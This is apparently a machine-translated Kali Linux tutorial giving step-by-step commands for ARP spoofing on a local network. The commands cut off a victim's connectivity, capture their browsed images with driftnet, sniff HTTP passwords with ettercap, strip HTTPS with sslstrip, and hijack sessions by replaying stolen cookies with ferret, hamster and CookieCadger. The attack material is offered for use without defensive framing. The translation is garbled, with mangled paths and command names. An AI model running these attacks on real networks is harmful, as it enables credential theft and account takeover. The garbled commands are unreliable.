First, the local area network disconnection
1, arp attack ---- let off target host network
Tools: arpspoof
Format: arpspoof -i -t target native LAN gateway ip
Ctrl + c to terminate attack
Check local area network using the internal ip
fping -asg 192.168.1.0/24
2, arp spoofing ----- off network phenomenon does not occur in time to get targeted traffic
Let mesh ip flow through my local card, out of my gateway does not appear broken network phenomenon
echo 1> / proc / sys / net / ipv4 / ip_forward ------- make the target flow out (the command did not return significant content) from my local gateway arpspoof -i eth0 -t 192.168.1.10 192.168.1.1 - ---- let targeted traffic through NIC
driftnet ---- take a picture of the traffic on the machine card, you can get the picture of the target host browse through arp spoofing
echo 1 >/proc/sys/net/ipv4/ip_forward
cat / proc / sys / net / ipv4 / ip_forward --- echo "1" indicates echo 1> / proc / sys / net / ipv4 / ip_forward successfully executed
arpspoof -i eth0 -t 192.168.1.10 192.168.1.1
driftnet -i eth0 ------------- will pop up a dialog box that displays pictures
3, HTTP get account password
echo 1 >/proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.10 192.168.1.1
ettercap -tq -i eth0 (-tq: Start a text mode)
4, obtain account password HTTPS
root @ times: ~ # vim /etc/ettercap/etter.conf
Amended as follows: remove comments
echo 1 >/proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.10 192.168.1.1
sslstrip ------------ will revert to HTTP HTTPS link
sslstrip -a -f -k
ettercap -Tq -i eth0
5, session hijacking
echo 1 >/proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 192.168.1.10 192.168.1.1
wireshark --- Ethereal
Stop packet capture, data capture and save: saved to your desktop, file format with pacp format
root @ TEST: ~ # cd Desktop
root @ TEST: ~ / Desktop # ferret -r cookie.pcap
root @ TEST: ~ / Desktop # cp hamster.txt / root /
root@TEST:~# hamster
Follow the prompts to set your browser's proxy address and port
In the browser, enter:
It will be displayed in the IP session hijacked page
Method two: always synchronized
ferret -i eth0
hamsert
Then open your browser and enter 127.0.0.1:1234
This also can
kali64 bit installation ferret
No 64-bit ferret
32 may be mounted in
1. Add support for 32-bit
dpkg --add-architecture i386
2. Update
apt-get clean && apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y
3. Install ferret
sudo aptitude install ferret-sidejack:i386
-- apt-get install aptitude
feeret --- regenerate after the capture file
hamster - used to replay traffic
root @ TEST: ~ # cp CookieCadger-1.08.jar Desktop /
root@TEST:~# cp CookieCadger-1.08.jar 桌面/
java -jar CookieCadger-1.08.jar
Install the Java environment in Kali
JAVA download 1.8u121 of the JDK 1.
Download: HTTP: //java.sun.com/javase/downloads/index.jsp
2. Unzip the file and move to / opt
tar-xzvf the JDK-8u91 x64.tar.gz--linux
Music Videos jdk1.8.0_91 / opt
CD /opt/jdk1.8.0_91
3. setting environment variables
performed gedit ~ / .bashrc, and add the following
# the install the JDK the JAVA
Export the JAVA_HOME = / opt / jdk1 .8.0_91
Export the CLASSPATH =:. $ {the JAVA_HOME} / lib
Export the PATH = $ {the JAVA_HOME} / bin: $ the PATH
save and exit
performed ~ Source / .bashrc
4. installed and registered
performed:
Update-Alternatives --install / usr / bin / Java Java /opt/jdk1.8.0_121/bin/java. 1
Update-Alternatives --install / usr / bin / the javac the javac /opt/jdk1.8.0_121/bin/javac. 1
Update the --set Java-Alternatives / opt /jdk1.8.0_121/bin/java
update-alternatives --set javac /opt/jdk1.8.0_121/bin/javac
see the results:
Then the installation was successful.
Reference documents: https://www.cnblogs.com/Silvers/p/5843207.html
Novice need to supplement the knowledge:
1, input Chinese characters in the file or recognize Chinese characters
the vim: set fileencoding can view the file encoding
: set fileencoding = utf-8 format and save the modified encoding can be written Chinese